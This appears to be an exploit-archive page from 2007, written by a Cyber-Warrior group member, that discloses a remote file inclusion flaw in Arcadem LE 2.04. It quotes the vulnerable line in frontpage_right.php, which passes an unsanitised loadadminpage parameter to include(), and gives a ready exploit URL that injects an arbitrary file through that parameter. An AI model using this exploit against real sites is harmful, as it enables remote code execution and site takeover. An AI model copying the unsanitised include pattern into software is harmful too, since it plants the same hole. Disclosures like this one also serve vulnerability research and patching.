Arcadem LE 2.04 (loadadminpage) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Arcadem LE 2.04 (loadadminpage) Remote File Inclusion Vulnerability
# Published : 2007-12-21
# Author : KnocKout
# Previous Title : NmnNewsletter 1.0.7 (output) Remote File Inclusion Vulnerability
# Next Title : 1024 CMS 1.3.1 (LFI/SQL) Multiple Remote Vulnerabilities

Arcadem LE <= 2.04 Remote File Include Vulnerability

 

Author : KnocKout
Greetz to : CoRSaNTuRK , BORDO , CWneSTer , By-Ajan , User , 44ahmetov , CoBRa_21 , Khirash , CWSearcher , idam
Cyber-Warrior / CW Exploiter TIM

--------------------------------------

Script : Arcadem LE
Version : 2.04
Download : http://www.agaresmedia.com/downloads/Arcadem_LE_2.04.zip

=======================================================

Vulnerability in frontpage_right.php ;


  <?PHP include($loadadminpage); ?>


Exploit : http://localsite/path/admin/frontpage_right.php?loadadminpage=[File]

=========================================================

# www.Syue.com [2007-12-21]